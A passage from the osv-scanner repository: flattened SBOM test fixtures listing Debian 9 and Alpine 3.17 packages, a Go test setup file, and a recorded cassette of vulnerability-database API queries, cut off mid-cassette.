/var/lib/dpkg/status 799 Anibal Monsalve Salazar <anibal@debian.org> sensible-utils 0.0.9+deb9u1 GPL-2.0-only cpe:2.3:a:sensible-utils:sensible-utils:0.0.9\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/sensible-utils@0.0.9+deb9u1?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:sensible-utils:sensible_utils:0.0.9\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:sensible_utils:sensible-utils:0.0.9\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:sensible_utils:sensible_utils:0.0.9\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:sensible:sensible-utils:0.0.9\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:sensible:sensible_utils:0.0.9\+deb9u1:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/sensible-utils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/sensible-utils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 62 Debian Apache Maintainers <debian-apache@lists.debian.org> ssl-cert 1.0.39 BSD-3-Clause cpe:2.3:a:ssl-cert:ssl-cert:1.0.39:*:*:*:*:*:*:* pkg:deb/debian/ssl-cert@1.0.39?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:ssl-cert:ssl_cert:1.0.39:*:*:*:*:*:*:* cpe:2.3:a:ssl_cert:ssl-cert:1.0.39:*:*:*:*:*:*:* cpe:2.3:a:ssl_cert:ssl_cert:1.0.39:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-cert:1.0.39:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_cert:1.0.39:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/ssl-cert/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/ssl-cert.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 63 Debian sysvinit maintainers <pkg-sysvinit-devel@lists.alioth.debian.org> sysvinit-utils 2.88dsf-59.9 GPL-2.0-only cpe:2.3:a:sysvinit-utils:sysvinit-utils:2.88dsf-59.9:*:*:*:*:*:*:* pkg:deb/debian/sysvinit-utils@2.88dsf-59.9?arch=amd64&upstream=sysvinit&distro=debian-9 dpkgdb-cataloger 
DpkgMetadata deb cpe:2.3:a:sysvinit-utils:sysvinit_utils:2.88dsf-59.9:*:*:*:*:*:*:* cpe:2.3:a:sysvinit_utils:sysvinit-utils:2.88dsf-59.9:*:*:*:*:*:*:* cpe:2.3:a:sysvinit_utils:sysvinit_utils:2.88dsf-59.9:*:*:*:*:*:*:* cpe:2.3:a:sysvinit:sysvinit-utils:2.88dsf-59.9:*:*:*:*:*:*:* cpe:2.3:a:sysvinit:sysvinit_utils:2.88dsf-59.9:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/sysvinit-utils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/sysvinit-utils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 110 sysvinit Bdale Garbee <bdale@gag.com> tar 1.29b-1.1+deb9u1 GPL-2.0-only GPL-3.0-only cpe:2.3:a:tar:tar:1.29b-1.1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/tar@1.29b-1.1+deb9u1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/tar/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/tar.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/tar.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 2774 GNU Libc Maintainers <debian-glibc@lists.debian.org> tzdata 2021a-0+deb9u3 cpe:2.3:a:tzdata:tzdata:2021a-0\+deb9u3:*:*:*:*:*:*:* pkg:deb/debian/tzdata@2021a-0+deb9u3?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/tzdata/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/tzdata.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 3036 Manoj Srivastava <srivasta@debian.org> ucf 3.0036 GPL-2.0-only cpe:2.3:a:ucf:ucf:3.0036:*:*:*:*:*:*:* pkg:deb/debian/ucf@3.0036?arch=all&distro=debian-9 
dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/ucf/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/ucf.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/ucf.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 191 Debian util-linux Maintainers <ah-util-linux@debian.org> util-linux 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:util-linux:util-linux:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/util-linux@2.29.2-1+deb9u1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:util-linux:util_linux:2.29.2-1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:util_linux:util-linux:2.29.2-1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:util_linux:util_linux:2.29.2-1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:util:util-linux:2.29.2-1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:util:util_linux:2.29.2-1\+deb9u1:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/util-linux/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/util-linux.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/util-linux.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 3558 Jonathan Nieder <jrnieder@gmail.com> xz-utils 5.2.2-1.2+deb9u1 Autoconf GPL-2.0-only GPL-2.0-or-later GPL-3.0-only LGPL-2.0-only LGPL-2.1-only LGPL-2.1-or-later PD PD-debian config-h noderivs permissive-fsf permissive-nowarranty probably-PD cpe:2.3:a:xz-utils:xz-utils:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* 
pkg:deb/debian/xz-utils@5.2.2-1.2+deb9u1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:xz-utils:xz_utils:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:xz_utils:xz-utils:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:xz_utils:xz_utils:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:xz:xz-utils:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:xz:xz_utils:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /usr/share/doc/xz-utils/copyright sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /var/lib/dpkg/info/xz-utils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 515 Mark Brown <broonie@debian.org> zlib1g 1:1.2.8.dfsg-5+deb9u1 cpe:2.3:a:zlib1g:zlib1g:1\:1.2.8.dfsg-5\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/zlib1g@1:1.2.8.dfsg-5+deb9u1?arch=amd64&upstream=zlib&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/zlib1g/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/zlib1g:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 156 zlib Debian Med Packaging <debian-med-packaging@lists.alioth.debian.org> zstd 1.1.2-1+deb9u1 BSD-3-clause-with-patent-grant Expat Zlib cpe:2.3:a:zstd:zstd:1.1.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/zstd@1.1.2-1+deb9u1?arch=amd64&upstream=libzstd&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /usr/share/doc/zstd/copyright sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /var/lib/dpkg/info/zstd.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1218 libzstd debian 9 Debian GNU/Linux 9 (stretch) https://bugs.debian.org/ https://www.debian.org/ https://www.debian.org/support support debian 
Debian GNU/Linux 9 (stretch) stretch 9 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/with-duplicates.cdx.xml ================================================ 2023-03-02T12:04:22+11:00 anchore syft 0.73.0 alpine:latest sha256:fd6275a37d2472b9d3be70c3261087b8d65e441c21342ae7313096312bcda2b3 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 331776 alpine-baselayout Q1/eXfmbYT1WXenFSqKjroYyK84NE= alpine-baselayout-data=3.4.0-r0 /bin/sh 8890 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout-data 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout-data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout-data@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout-data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* 
cpe:2.3:a:alpine-baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 77824 alpine-baselayout Q1/JgpM8J6DWI/541tUX+uHEzSjqo= 11664 Natanael Copa <ncopa@alpinelinux.org> alpine-keys 2.4-r1 Public keys for Alpine Linux packages MIT cpe:2.3:a:alpine-keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* pkg:apk/alpine/alpine-keys@2.4-r1?arch=x86_64&upstream=alpine-keys&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_keys:2.4-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed aab68f8c9ab434a46710de8e12fb3206e2930a59 159744 alpine-keys Q1KM01lfKVp+gEZn23awujqjSkrN8= 13361 Natanael Copa <ncopa@alpinelinux.org> apk-tools 2.12.10-r1 Alpine Package Keeper - package manager for alpine GPL-2.0-only cpe:2.3:a:apk-tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* pkg:apk/alpine/apk-tools@2.12.10-r1?arch=x86_64&upstream=apk-tools&distro=alpine-3.17.2 https://gitlab.alpinelinux.org/alpine/apk-tools apkdb-cataloger ApkMetadata apk cpe:2.3:a:apk-tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk_tools:2.12.10-r1:*:*:*:*:*:*:* 
sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 0188f510baadbae393472103427b9c1875117136 307200 apk-tools so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 120973 busybox 1.35.0 cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* binary-cataloger BinaryMetadata binary cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /bin/busybox Sören Tempel <soeren+alpine@soeren-tempel.net> busybox-binsh 1.36.1-r27 busybox ash /bin/sh GPL-2.0-only cpe:2.3:a:busybox-binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/busybox-binsh@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:busybox-binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 8192 busybox /bin/sh cmd:sh=1.36.1-r27 Q1miWwyhWKXVEiRYLhmArV1TKMs6A= busybox=1.36.1-r27 1547 Natanael Copa <ncopa@alpinelinux.org> ca-certificates-bundle 20220614-r4 Pre generated bundle of Mozilla certificates MPL-2.0 MIT cpe:2.3:a:ca-certificates-bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* pkg:apk/alpine/ca-certificates-bundle@20220614-r4?arch=x86_64&upstream=ca-certificates&distro=alpine-3.17.2 https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ca-certificates-bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* 
cpe:2.3:a:ca_certificates_bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e1839fd45a096c9e21ac24f8a61991d357d11628 237568 ca-certificates ca-certificates-cacert=20220614-r4 Q14PFUzkDXTGDcHkiuEdFuzb+EvxQ= 126296 Natanael Copa <ncopa@alpinelinux.org> libc-utils 0.7.2-r3 Meta package to pull in correct libc BSD-2-Clause BSD-3-Clause cpe:2.3:a:libc-utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* pkg:apk/alpine/libc-utils@0.7.2-r3?arch=x86_64&upstream=libc-dev&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:libc-utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_utils:0.7.2-r3:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 60424133be2e79bbfeff3d58147a22886f817ce2 4096 libc-dev Q19Gg06pBPiiG9UN94ql7qImsHSUQ= musl-utils 1485 Ariadne Conill <ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 
524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libssl3 3.0.8-r0 SSL shared libraries Apache-2.0 cpe:2.3:a:libssl3:libssl3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libssl3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 622592 openssl so:libssl.so.3=3 Q1Z6/d/FKYkPehWzNtOtYnJ74oIkY= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 246853 Timo Teräs <timo.teras@iki.fi> musl 1.2.3-r4 the musl c library (libc) implementation MIT cpe:2.3:a:musl:musl:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 634880 musl so:libc.musl-x86_64.so.1=1 Q1Pk7x1woArbB1nzkMPJPq1TECwus= 388955 Timo Teräs <timo.teras@iki.fi> musl-utils 1.2.3-r4 the musl c library (libc) implementation MIT BSD-2-Clause GPL-2.0-or-later cpe:2.3:a:musl-utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl-utils@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk 
cpe:2.3:a:musl-utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl_utils:1.2.3-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 135168 musl cmd:getconf=1.2.3-r4 cmd:getent=1.2.3-r4 cmd:iconv=1.2.3-r4 cmd:ldconfig=1.2.3-r4 cmd:ldd=1.2.3-r4 Q1ZWJL4eySx8nPSjF1FAJgQyvuNs4= scanelf so:libc.musl-x86_64.so.1 36697 Natanael Copa <ncopa@alpinelinux.org> scanelf 1.3.5-r1 Scan ELF binaries for stuff GPL-2.0-only cpe:2.3:a:scanelf:scanelf:1.3.5-r1:*:*:*:*:*:*:* pkg:apk/alpine/scanelf@1.3.5-r1?arch=x86_64&upstream=pax-utils&distro=alpine-3.17.2 https://wiki.gentoo.org/wiki/Hardened/PaX_Utilities apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e52243dbb02069f10d48440ccc5fd41fa5fc2236 98304 pax-utils cmd:scanelf=1.3.5-r1 Q11dxYFsHvBFAzzHGDo5gOTDNJDyQ= so:libc.musl-x86_64.so.1 37687 Sören Tempel <soeren+alpine@soeren-tempel.net> ssl_client 1.36.1-r27 EXternal ssl_client for busybox wget GPL-2.0-only cpe:2.3:a:ssl-client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/ssl_client@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ssl-client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_client:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 28672 busybox cmd:ssl_client=1.36.1-r27 Q1QuqZjeP6XG85I29tOiCWofL8Cj0= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 4929 Natanael Copa 
<ncopa@alpinelinux.org> zlib 1.2.10-r0 A compression/decompression Library Zlib cpe:2.3:a:zlib:zlib:1.2.10-r0:*:*:*:*:*:*:* pkg:apk/alpine/zlib@1.2.10-r0?arch=x86_64&upstream=zlib&distro=alpine-3.17.2 https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 Natanael Copa <ncopa@alpinelinux.org> zlib 1.2.10-r0 A compression/decompression Library Zlib cpe:2.3:a:zlib:zlib:1.2.10-r0:*:*:*:*:*:*:* pkg:apk/alpine/zlib@1.2.10-r0?arch=x86_64&upstream=zlib&distro=alpine-3.17.2 https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 alpine 3.17.2 Alpine Linux v3.17 https://gitlab.alpinelinux.org/alpine/aports/-/issues https://alpinelinux.org/ alpine Alpine Linux v3.17 3.17.2 ================================================ FILE: cmd/osv-scanner/scan/source/testmain_test.go ================================================ package source_test import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan/source" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { config.OSVScannerConfigName = "osv-scanner-test.toml" cleanupGitFixtures, err := testcmd.SetupGitFixtures() if err != nil { cleanupGitFixtures() panic(err) } slog.SetDefault(slog.New(testlogger.New())) testcmd.CommandsUnderTest = []cmd.CommandBuilder{source.Command} m.Run() 
cleanupGitFixtures() testutility.CleanSnapshots(m) } ================================================ FILE: cmd/osv-scanner/scan/testdata/cassettes/TestCommand_SubCommands.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_SubCommands/scan_with_a_flag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_SubCommands/with_no_subcommand url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json 